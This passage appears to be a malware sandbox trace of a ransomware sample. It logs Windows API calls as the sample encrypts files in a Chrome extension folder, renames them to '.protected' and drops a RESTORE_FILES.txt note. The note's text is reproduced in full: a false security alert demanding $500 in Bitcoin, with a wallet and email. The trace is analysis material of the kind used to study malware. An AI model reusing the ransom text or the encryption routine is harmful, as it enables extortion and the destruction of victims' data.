(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.783] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.783] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.783] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.783] CloseHandle (hObject=0x164) returned 1 [0078.783] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.783] lstrcmpiW (lpString1="pt_PT", lpString2="Windows") returned -1 [0078.783] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files") returned 1 [0078.783] lstrcmpiW (lpString1="pt_PT", lpString2="Program Files (x86)") returned 1 [0078.783] lstrcmpiW (lpString1="pt_PT", lpString2="$Recycle.bin") returned 1 [0078.783] lstrcmpiW (lpString1="pt_PT", lpString2="System Volume Information") returned -1 [0078.783] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT") returned 144 [0078.784] lstrcmpW (lpString1="pt_PT", lpString2=".") returned 1 [0078.784] lstrcmpW (lpString1="pt_PT", lpString2="..") returned 1 [0078.784] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*") returned 146 [0078.784] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.784] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.784] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.784] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.784] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.784] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.784] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\.") returned 146 [0078.784] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.784] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.785] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.785] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.785] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.785] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.785] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.785] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\..") returned 147 [0078.785] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.785] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.785] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.785] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.785] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.785] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.785] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.785] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.785] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0078.785] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.785] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.785] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.785] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.785] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0078.785] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.785] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0078.785] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.785] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0078.785] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.785] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.786] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.786] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe0, lpOverlapped=0x0) returned 1 [0078.786] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.786] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.786] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.787] CloseHandle (hObject=0x168) returned 1 [0078.787] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.protected") returned 168 [0078.787] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0078.787] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.787] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.787] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 162 [0078.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.787] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.787] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.788] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.788] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.788] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.788] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.788] CloseHandle (hObject=0x164) returned 1 [0078.788] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.788] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0078.788] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0078.788] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0078.789] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0078.789] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0078.789] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro") returned 141 [0078.789] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0078.789] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0078.789] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*") returned 143 [0078.789] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.789] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.789] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.789] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.789] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.789] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.789] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\.") returned 143 [0078.789] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.789] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.789] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.789] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.789] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.789] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.789] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.789] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\..") returned 144 [0078.789] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.789] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.789] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.789] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.789] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.789] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.789] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.789] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.789] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0078.789] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.790] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.790] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.790] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.790] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0078.790] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.790] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0078.790] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.790] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0078.790] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.790] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.791] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.791] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0078.791] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.791] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.791] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.791] CloseHandle (hObject=0x168) returned 1 [0078.791] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.protected") returned 165 [0078.791] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\messages.json.protected")) returned 1 [0078.792] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.792] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.792] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\RESTORE_FILES.txt") returned 159 [0078.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.792] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.792] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.793] lstrlenA 